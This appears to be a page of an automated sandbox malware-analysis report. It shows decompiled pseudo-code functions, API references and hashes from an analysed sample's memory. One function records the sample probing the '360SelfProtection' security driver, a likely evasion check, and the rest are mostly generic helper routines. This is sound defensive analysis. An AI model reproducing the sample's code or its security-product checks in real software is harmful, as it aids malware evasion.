                                                                                                                                                                                          0x00c8dfcb
                                                                                                                                                                                          0x00c8dfd3
                                                                                                                                                                                          0x00c8dfd3
                                                                                                                                                                                          0x00c8df8d
                                                                                                                                                                                          0x00c8df8d
                                                                                                                                                                                          0x00c8df9a
                                                                                                                                                                                          0x00c8df9a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                          • String ID: \\.\360SelfProtection
                                                                                                                                                                                          • API String ID: 33631002-936859468
                                                                                                                                                                                          • Opcode ID: bd99e1f414a8938107f0623812f849df055b1bbee4ed94ec82b67711ff8f6f82
                                                                                                                                                                                          • Instruction ID: 6a65ece6fe21ff81f871c8b9249fa9119d49875091457d365301c02cb63d94a1
                                                                                                                                                                                          • Opcode Fuzzy Hash: bd99e1f414a8938107f0623812f849df055b1bbee4ed94ec82b67711ff8f6f82
                                                                                                                                                                                          • Instruction Fuzzy Hash: CBF06831744310BFE210EA98AC0AF9B7798AB85F11F444A28F795EA1D0D7B45A0CC7B7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C97316 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00C97316(void* __eflags, struct HINSTANCE__* _a4, WCHAR* _a8, intOrPtr _a12) {
				struct _WNDCLASSEXW _v52;
				int _t13;
				void* _t18;
				struct HINSTANCE__* _t19;

				_v52.cbSize = 0x30;
				E00D006A0(_t18,  &(_v52.style), 0, 0x2c);
				_t19 = _a4;
				_t13 = GetClassInfoExW(_t19, _a8,  &_v52);
				if(_t13 != 0) {
					_v52.lpszClassName = _a12;
					_v52.hInstance = _t19;
					return RegisterClassExW( &_v52) & 0x0000ffff;
				}
				return _t13;
			}







                                                                                                                                                                                          0x00c97325
                                                                                                                                                                                          0x00c9732c
                                                                                                                                                                                          0x00c97331
                                                                                                                                                                                          0x00c9733f
                                                                                                                                                                                          0x00c97347
                                                                                                                                                                                          0x00c9734c
                                                                                                                                                                                          0x00c97353
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9735c
                                                                                                                                                                                          0x00c97361

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Class$InfoRegister_memset
                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                          • API String ID: 735845640-4108050209
                                                                                                                                                                                          • Opcode ID: 2aeccb86bd0120daafe3b65aa34417c1cb37d5087edb91cab63249958193c5fd
                                                                                                                                                                                          • Instruction ID: 2e0329227f7cc20e90a2c987b723c850da50f8043554f336404f8410c86a6d42
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2aeccb86bd0120daafe3b65aa34417c1cb37d5087edb91cab63249958193c5fd
                                                                                                                                                                                          • Instruction Fuzzy Hash: A8F0F871911228ABDB00AF99EC49FEE7BBCBF44340F444015FD54E6280E774A6148BA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8F510 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                          			E00C8F510(intOrPtr _a4) {
				_Unknown_base(*)()* _t5;

				_t5 = GetProcAddress(GetModuleHandleW(L"ntdll"), "RtlGetVersion");
				if(_t5 == 0) {
					return 0;
				} else {
					return 0 |  *_t5(_a4) >= 0x00000000;
				}
			}




                                                                                                                                                                                          0x00c8f521
                                                                                                                                                                                          0x00c8f529
                                                                                                                                                                                          0x00c8f540
                                                                                                                                                                                          0x00c8f52b
                                                                                                                                                                                          0x00c8f53b
                                                                                                                                                                                          0x00c8f53b

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll,RtlGetVersion), ref: 00C8F51A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00C8F521
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                          • String ID: RtlGetVersion$ntdll
                                                                                                                                                                                          • API String ID: 1646373207-2582309562
                                                                                                                                                                                          • Opcode ID: 1474c3afbd842939c581cbdeaea5938b5cdd0b8f55a7cb05b02e49cfd9c7734d
                                                                                                                                                                                          • Instruction ID: 171b759305b6b5a377ef746d8d2a8bf6529c573c5fb89da829df5142cbfbdb41
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1474c3afbd842939c581cbdeaea5938b5cdd0b8f55a7cb05b02e49cfd9c7734d
                                                                                                                                                                                          • Instruction Fuzzy Hash: FED0C9B23113015B9754FBFD5C0EE4B619E6FE4B42744C4397142D3298DEB0C516E635
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C85D00 Relevance: 6.2, APIs: 4, Instructions: 176COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                          			E00C85D00(intOrPtr* __eax, intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t63;
				void* _t67;
				intOrPtr _t71;
				intOrPtr* _t83;
				intOrPtr _t84;
				intOrPtr* _t88;
				intOrPtr* _t103;
				intOrPtr* _t104;
				intOrPtr* _t105;
				signed int _t108;
				long _t109;
				void* _t111;
				void* _t114;
				void* _t115;
				void* _t116;
				void* _t117;

				_t84 = 0;
				_t103 = __ecx;
				_t92 =  *((intOrPtr*)(__ecx + 0xc4));
				_t104 = __ecx + 0xccc;
				 *_t104 =  *((intOrPtr*)(__ecx + 4));
				 *((intOrPtr*)(_t104 + 4)) = 0;
				 *((intOrPtr*)(_t104 + 8)) = 4;
				 *((intOrPtr*)(_t104 + 0xc)) = 0;
				 *((intOrPtr*)(_t104 + 0x10)) = 1;
				 *((intOrPtr*)(_t104 + 0x18)) =  *((intOrPtr*)(__ecx + 8));
				 *((intOrPtr*)(_t104 + 0x1c)) = 0;
				 *(_t104 + 0x20) = 8;
				 *((intOrPtr*)(_t104 + 0x24)) = 0;
				 *((intOrPtr*)(_t104 + 0x28)) = 0;
				_t108 = 2;
				_t88 = __ecx + 0xcc;
				 *((intOrPtr*)(_t114 + 0x1c)) = _t92;
				 *((intOrPtr*)(_t114 + 0x18)) = 0;
				 *(_t114 + 0x10) = 2;
				 *((intOrPtr*)(__ecx + 0xb8)) = 0;
				 *((intOrPtr*)(__ecx + 0xbc)) = 0;
				 *((intOrPtr*)(__ecx + 0xc0)) = 0;
				if(__eax != 0) {
					 *__eax =  *((intOrPtr*)(__ecx + 0x14));
					_t92 =  *((intOrPtr*)(_t114 + 0x1c));
				}
				if( *((intOrPtr*)(_t114 + 0x34)) != _t84) {
					 *((intOrPtr*)(_t114 + 0x18)) = E00C85370;
				}
				 *((intOrPtr*)(_t114 + 0x20)) =  *((intOrPtr*)(_t103 + 0x10));
				if(_t92 <= _t84) {
					L9:
					 *((intOrPtr*)(_t114 + 0x14)) = _t108 + _t108 * 2 + _t108 + _t108 * 2 + _t108 + _t108 * 2 + _t108 + _t108 * 2 + _t108 + _t108 * 2 + _t108 + _t108 * 2 + _t108 + _t108 * 2 + _t108 + _t108 * 2;
					_t63 = E00D017AD(_t84, _t92, _t103, _t108 + _t108 * 2 + _t108 + _t108 * 2 + _t108 + _t108 * 2 + _t108 + _t108 * 2 + _t108 + _t108 * 2 + _t108 + _t108 * 2 + _t108 + _t108 * 2 + _t108 + _t108 * 2);
					_t115 = _t114 + 4;
					 *((intOrPtr*)(_t115 + 0x14)) = _t63;
					if(_t63 != _t84) {
						E00D06580(_t84, _t103, _t104, _t63, _t104,  *((intOrPtr*)(_t115 + 0x10)));
						_t116 = _t115 + 0xc;
						_t93 = _t116 + 0x20;
						_push(_t116 + 0x20);
						_t109 =  *((intOrPtr*)(_t116 + 0x2c));
						_t67 = E00C84E40(_t103, _t109, _t108, E00C81C60,  *((intOrPtr*)(_t115 + 0x3c)),  *((intOrPtr*)(_t115 + 0x24)), _t103);
						_t117 = _t116 + 0x1c;
						__eflags = _t67;
						if(__eflags != 0) {
							__eflags =  *((intOrPtr*)(_t117 + 0x1c)) - _t84;
							if( *((intOrPtr*)(_t117 + 0x1c)) == _t84) {
								_t93 =  *((intOrPtr*)(_t117 + 0x20)) + 7;
								asm("adc eax, ebx");
								_t111 = E00D0AA40( *((intOrPtr*)(_t117 + 0x20)) + 7,  *((intOrPtr*)(_t117 + 0x24)), 8, _t84) + _t73 + E00D0AA40( *((intOrPtr*)(_t117 + 0x20)) + 7,  *((intOrPtr*)(_t117 + 0x24)), 8, _t84) + _t73 + E00D0AA40( *((intOrPtr*)(_t117 + 0x20)) + 7,  *((intOrPtr*)(_t117 + 0x24)), 8, _t84) + _t73 + E00D0AA40( *((intOrPtr*)(_t117 + 0x20)) + 7,  *((intOrPtr*)(_t117 + 0x24)), 8, _t84) + _t73 -  *((intOrPtr*)(_t117 + 0x20));
								__eflags = _t111;
								if(_t111 != 0) {
									E00D006A0(_t103, _t104, _t84, _t111);
									_push(_t111);
									_push(_t104);
									_push( *((intOrPtr*)(_t117 + 0x3c)));
									E00C82EA0();
									_t117 = _t117 + 0x18;
								}
							}
							_t105 =  *((intOrPtr*)(_t117 + 0x34));
							__eflags = _t105 - _t84;
							if(__eflags != 0) {
								_t93 = _t117 + 0x20;
								_t71 = E00C854A0(_t103, _t117 + 0x20);
								_t117 = _t117 + 4;
								 *_t105 = _t71;
							}
							_push( *((intOrPtr*)(_t117 + 0x14)));
							E00D0092B(_t84, _t93, _t103, _t105, __eflags);
							return 1;
						} else {
							_push(_t109);
							E00D0092B(_t84, _t93, _t103, _t104, __eflags);
							__eflags = 0;
							return 0;
						}
					} else {
						SetLastError(8);
						_push(0xd47270);
						_push(_t84);
						_push(_t84);
						E00C88150(0xd47270);
						return 0;
					}
				}
				_t83 = _t104 + 0x3c;
				 *((intOrPtr*)(_t114 + 0x14)) = _t92;
				do {
					_t92 = 0xf000;
					if( *((intOrPtr*)(_t88 + 8)) == 0xf000) {
						asm("adc ebp, edx");
						 *((intOrPtr*)(_t83 - 8)) = 0;
						 *((intOrPtr*)(_t83 - 0xc)) =  *_t88 +  *((intOrPtr*)(_t114 + 0x20));
						_t99 =  *((intOrPtr*)(_t88 + 4)) + 7 >> 3;
						_t100 = ( *((intOrPtr*)(_t88 + 4)) + 7 >> 3) + _t99;
						_t101 = ( *((intOrPtr*)(_t88 + 4)) + 7 >> 3) + _t99 + _t100;
						_t84 = 0;
						_t92 = ( *((intOrPtr*)(_t88 + 4)) + 7 >> 3) + _t99 + _t100 + _t101;
						_t108 =  *(_t114 + 0x10) + 1;
						 *((intOrPtr*)(_t83 - 4)) = ( *((intOrPtr*)(_t88 + 4)) + 7 >> 3) + _t99 + _t100 + _t101;
						 *_t83 = 0;
						 *((intOrPtr*)(_t83 + 4)) = 0;
						 *(_t114 + 0x10) = _t108;
						_t83 = _t83 + 0x18;
					}
					_t88 = _t88 + 0xc;
					_t38 = _t114 + 0x14;
					 *_t38 =  *((intOrPtr*)(_t114 + 0x14)) - 1;
				} while ( *_t38 != 0);
				goto L9;
			}























                                                                                                                                                                                          0x00c85d05
                                                                                                                                                                                          0x00c85d09
                                                                                                                                                                                          0x00c85d0e
                                                                                                                                                                                          0x00c85d14
                                                                                                                                                                                          0x00c85d1a
                                                                                                                                                                                          0x00c85d1c
                                                                                                                                                                                          0x00c85d1f
                                                                                                                                                                                          0x00c85d26
                                                                                                                                                                                          0x00c85d29
                                                                                                                                                                                          0x00c85d33
                                                                                                                                                                                          0x00c85d36
                                                                                                                                                                                          0x00c85d39
                                                                                                                                                                                          0x00c85d40
                                                                                                                                                                                          0x00c85d43
                                                                                                                                                                                          0x00c85d46
                                                                                                                                                                                          0x00c85d4b
                                                                                                                                                                                          0x00c85d51
                                                                                                                                                                                          0x00c85d55
                                                                                                                                                                                          0x00c85d59
                                                                                                                                                                                          0x00c85d5d
                                                                                                                                                                                          0x00c85d63
                                                                                                                                                                                          0x00c85d69
                                                                                                                                                                                          0x00c85d71
                                                                                                                                                                                          0x00c85d76
                                                                                                                                                                                          0x00c85d78
                                                                                                                                                                                          0x00c85d78
                                                                                                                                                                                          0x00c85d80
                                                                                                                                                                                          0x00c85d82
                                                                                                                                                                                          0x00c85d82
                                                                                                                                                                                          0x00c85d8d
                                                                                                                                                                                          0x00c85d93
                                                                                                                                                                                          0x00c85dec
                                                                                                                                                                                          0x00c85df7
                                                                                                                                                                                          0x00c85dfb
                                                                                                                                                                                          0x00c85e00
                                                                                                                                                                                          0x00c85e03
                                                                                                                                                                                          0x00c85e09
                                                                                                                                                                                          0x00c85e38
                                                                                                                                                                                          0x00c85e45
                                                                                                                                                                                          0x00c85e48
                                                                                                                                                                                          0x00c85e4c
                                                                                                                                                                                          0x00c85e56
                                                                                                                                                                                          0x00c85e5d
                                                                                                                                                                                          0x00c85e62
                                                                                                                                                                                          0x00c85e65
                                                                                                                                                                                          0x00c85e67
                                                                                                                                                                                          0x00c85e7c
                                                                                                                                                                                          0x00c85e80
                                                                                                                                                                                          0x00c85e8b
                                                                                                                                                                                          0x00c85e90
                                                                                                                                                                                          0x00c85ea1
                                                                                                                                                                                          0x00c85ea1
                                                                                                                                                                                          0x00c85ea5
                                                                                                                                                                                          0x00c85eaa
                                                                                                                                                                                          0x00c85eb6
                                                                                                                                                                                          0x00c85eb7
                                                                                                                                                                                          0x00c85eb8
                                                                                                                                                                                          0x00c85eb9
                                                                                                                                                                                          0x00c85ebe
                                                                                                                                                                                          0x00c85ebe
                                                                                                                                                                                          0x00c85ea5
                                                                                                                                                                                          0x00c85ec1
                                                                                                                                                                                          0x00c85ec5
                                                                                                                                                                                          0x00c85ec7
                                                                                                                                                                                          0x00c85ec9
                                                                                                                                                                                          0x00c85ece
                                                                                                                                                                                          0x00c85ed3
                                                                                                                                                                                          0x00c85ed6
                                                                                                                                                                                          0x00c85ed6
                                                                                                                                                                                          0x00c85edc
                                                                                                                                                                                          0x00c85edd
                                                                                                                                                                                          0x00c85ef1
                                                                                                                                                                                          0x00c85e69
                                                                                                                                                                                          0x00c85e69
                                                                                                                                                                                          0x00c85e6a
                                                                                                                                                                                          0x00c85e72
                                                                                                                                                                                          0x00c85e7b
                                                                                                                                                                                          0x00c85e7b
                                                                                                                                                                                          0x00c85e0b
                                                                                                                                                                                          0x00c85e0d
                                                                                                                                                                                          0x00c85e13
                                                                                                                                                                                          0x00c85e18
                                                                                                                                                                                          0x00c85e19
                                                                                                                                                                                          0x00c85e1f
                                                                                                                                                                                          0x00c85e30
                                                                                                                                                                                          0x00c85e30
                                                                                                                                                                                          0x00c85e09
                                                                                                                                                                                          0x00c85d95
                                                                                                                                                                                          0x00c85d98
                                                                                                                                                                                          0x00c85da0
                                                                                                                                                                                          0x00c85da0
                                                                                                                                                                                          0x00c85da9
                                                                                                                                                                                          0x00c85db5
                                                                                                                                                                                          0x00c85db7
                                                                                                                                                                                          0x00c85dbe
                                                                                                                                                                                          0x00c85dc7
                                                                                                                                                                                          0x00c85dca
                                                                                                                                                                                          0x00c85dcc
                                                                                                                                                                                          0x00c85dce
                                                                                                                                                                                          0x00c85dd0
                                                                                                                                                                                          0x00c85dd2
                                                                                                                                                                                          0x00c85dd3
                                                                                                                                                                                          0x00c85dd6
                                                                                                                                                                                          0x00c85dd8
                                                                                                                                                                                          0x00c85ddb
                                                                                                                                                                                          0x00c85ddf
                                                                                                                                                                                          0x00c85ddf
                                                                                                                                                                                          0x00c85de2
                                                                                                                                                                                          0x00c85de5
                                                                                                                                                                                          0x00c85de5
                                                                                                                                                                                          0x00c85de5
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _malloc.LIBCMT ref: 00C85DFB
                                                                                                                                                                                          • SetLastError.KERNEL32(00000008), ref: 00C85E0D
                                                                                                                                                                                            • Part of subcall function 00C84E40: GetFileSizeEx.KERNEL32(?,?,?,?,?,00000000,00000002,Function_00001C60,?,?,?,?), ref: 00C84E59
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C85E94
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C85EAA
                                                                                                                                                                                            • Part of subcall function 00D0092B: __lock.LIBCMT ref: 00D00949
                                                                                                                                                                                            • Part of subcall function 00D0092B: ___sbh_find_block.LIBCMT ref: 00D00954
                                                                                                                                                                                            • Part of subcall function 00D0092B: ___sbh_free_block.LIBCMT ref: 00D00963
                                                                                                                                                                                            • Part of subcall function 00D0092B: RtlFreeHeap.NTDLL(00000000,?,00D58A38,0000000C,00D10CFD,00000000,?,00D0C457,?,00000001,?,?,00D0EF54,00000018,00D590E8,0000000C), ref: 00D00993
                                                                                                                                                                                            • Part of subcall function 00D0092B: GetLastError.KERNEL32(?,00D0C457,?,00000001,?,?,00D0EF54,00000018,00D590E8,0000000C,00D0EFE5,?,?,?,00D10DB7,0000000D), ref: 00D009A4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$FileFreeHeapSizeUnothrow_t@std@@@___sbh_find_block___sbh_free_block__ehfuncinfo$??2@__lock_malloc_memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2739003063-0
                                                                                                                                                                                          • Opcode ID: 434ec2266c1c7c1aadb997ae2ebe8f91bbe5f75251c617b5750925e1be39397c
                                                                                                                                                                                          • Instruction ID: f04349160397d86807c15057acb08590e149e1d77d9c395402e4d63e5f178c4b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 434ec2266c1c7c1aadb997ae2ebe8f91bbe5f75251c617b5750925e1be39397c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 175191B1A047059FD310EF69DC85A5BF7E4FB84314F84893DE99883301E775EA098BA6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CAF44E Relevance: 6.2, APIs: 4, Instructions: 157COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                          			E00CAF44E(void* __ecx, signed int _a8, signed int _a12, signed short* _a16) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t68;
				signed int _t70;
				signed int _t73;
				signed int _t74;
				signed int _t75;
				signed int _t91;
				void* _t97;
				signed int _t98;
				void* _t100;
				signed int _t104;
				signed int _t106;
				void* _t108;
				unsigned int _t117;
				signed int _t127;
				signed int _t137;
				void* _t139;
				signed int _t141;
				void* _t143;
				void* _t146;

				_push(__ecx);
				_t143 = __ecx;
				_t127 =  *(__ecx + 0xc);
				if(_t127 != 0) {
					_t70 =  *((intOrPtr*)(__ecx + 0x14)) - _t127;
					__eflags = _t70;
					_t68 = _t70 >> 1;
					_v8 = _t68;
				} else {
					_v8 = _v8 & _t127;
				}
				_t137 = _a12;
				if(_t137 != 0) {
					_t106 =  *(_t143 + 0x10);
					_t73 = _t106 - _t127 >> 1;
					_t97 = 0x7fffffff - _t73;
					_a12 = _t106;
					_t151 = 0x7fffffff - _t137;
					if(0x7fffffff < _t137) {
						_t73 = E00CAF2B9(_t97, _t137, _t143, _t151);
					}
					_t74 = _t73 + _t137;
					if(_v8 >= _t74) {
						_t75 = _a8;
						__eflags = _t106 - _t75 >> 1 - _t137;
						if(_t106 - _t75 >> 1 >= _t137) {
							_t98 =  *_a16 & 0x0000ffff;
							_a16 = _t106;
							_t139 = _t137 + _t137;
							_a16 = _a16 - _t139;
							 *(_t143 + 0x10) = E00CAEAE7(_t143, _a16, _t106, _t106);
							E00CAE44A(_t143, _a8, _a16, _a12);
							_t68 = _a8;
							_t108 = _t139 + _t68;
							while(1) {
								__eflags = _t68 - _t108;
								if(_t68 == _t108) {
									goto L23;
								}
								 *_t68 = _t98;
								_t68 = _t68 + 2;
								__eflags = _t68;
							}
						} else {
							_a16 =  *_a16 & 0x0000ffff;
							_t100 = _t137 + _t137;
							E00CAEAE7(_t143, _t75, _t106, _t100 + _t75);
							E00CAEEE9( *(_t143 + 0x10), _t137 - ( *(_t143 + 0x10) - _a8 >> 1),  &_a16);
							 *(_t143 + 0x10) =  *(_t143 + 0x10) + _t100;
							_t68 = _a8;
							_t146 =  *(_t143 + 0x10) - _t100;
							while(1) {
								__eflags = _t68 - _t146;
								if(_t68 == _t146) {
									break;
								}
								 *_t68 = _a16;
								_t68 = _t68 + 2;
								__eflags = _t68;
							}
						}
					} else {
						_t117 = _v8 >> 1;
						_t135 = 0x7fffffff - _t117;
						if(0x7fffffff - _t117 >= _v8) {
							_t14 =  &_v8;
							 *_t14 = _v8 + _t117;
							__eflags =  *_t14;
						} else {
							_v8 = _v8 & 0x00000000;
						}
						if(_v8 < _t74) {
							_v8 = _t74;
						}
						_push(0);
						_a12 = E00CADBED(_t97, _t137, _v8);
						E00CAEEE9(_t84 + (_a8 -  *(_t143 + 0xc) >> 1) * 2, _t137, _a16);
						E00CAEAE7(_t143,  *(_t143 + 0xc), _a8, _a12);
						_t104 = _a12;
						E00CAEAE7(_t143, _a8,  *(_t143 + 0x10), _t104 + ((_a8 -  *(_t143 + 0xc) >> 1) + _t137) * 2);
						_t91 =  *(_t143 + 0xc);
						_t141 = _t137 + ( *(_t143 + 0x10) - _t91 >> 1);
						_t155 = _t91;
						if(_t91 != 0) {
							E00D0068E(_t104, _t135, _t141, _t143, _t155, _t91);
						}
						 *((intOrPtr*)(_t143 + 0x14)) = _t104 + _v8 * 2;
						_t68 = _t104 + _t141 * 2;
						 *(_t143 + 0x10) = _t68;
						 *(_t143 + 0xc) = _t104;
					}
					L23:
				}
				return _t68;
			}



























                                                                                                                                                                                          0x00caf451
                                                                                                                                                                                          0x00caf453
                                                                                                                                                                                          0x00caf455
                                                                                                                                                                                          0x00caf45b
                                                                                                                                                                                          0x00caf465
                                                                                                                                                                                          0x00caf465
                                                                                                                                                                                          0x00caf467
                                                                                                                                                                                          0x00caf469
                                                                                                                                                                                          0x00caf45d
                                                                                                                                                                                          0x00caf45d
                                                                                                                                                                                          0x00caf45d
                                                                                                                                                                                          0x00caf46c
                                                                                                                                                                                          0x00caf471
                                                                                                                                                                                          0x00caf477
                                                                                                                                                                                          0x00caf484
                                                                                                                                                                                          0x00caf488
                                                                                                                                                                                          0x00caf48a
                                                                                                                                                                                          0x00caf48d
                                                                                                                                                                                          0x00caf48f
                                                                                                                                                                                          0x00caf491
                                                                                                                                                                                          0x00caf491
                                                                                                                                                                                          0x00caf496
                                                                                                                                                                                          0x00caf49b
                                                                                                                                                                                          0x00caf539
                                                                                                                                                                                          0x00caf542
                                                                                                                                                                                          0x00caf544
                                                                                                                                                                                          0x00caf597
                                                                                                                                                                                          0x00caf59b
                                                                                                                                                                                          0x00caf59f
                                                                                                                                                                                          0x00caf5a1
                                                                                                                                                                                          0x00caf5b1
                                                                                                                                                                                          0x00caf5ba
                                                                                                                                                                                          0x00caf5bf
                                                                                                                                                                                          0x00caf5c5
                                                                                                                                                                                          0x00caf5cf
                                                                                                                                                                                          0x00caf5cf
                                                                                                                                                                                          0x00caf5d1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00caf5ca
                                                                                                                                                                                          0x00caf5ce
                                                                                                                                                                                          0x00caf5ce
                                                                                                                                                                                          0x00caf5ce
                                                                                                                                                                                          0x00caf546
                                                                                                                                                                                          0x00caf54c
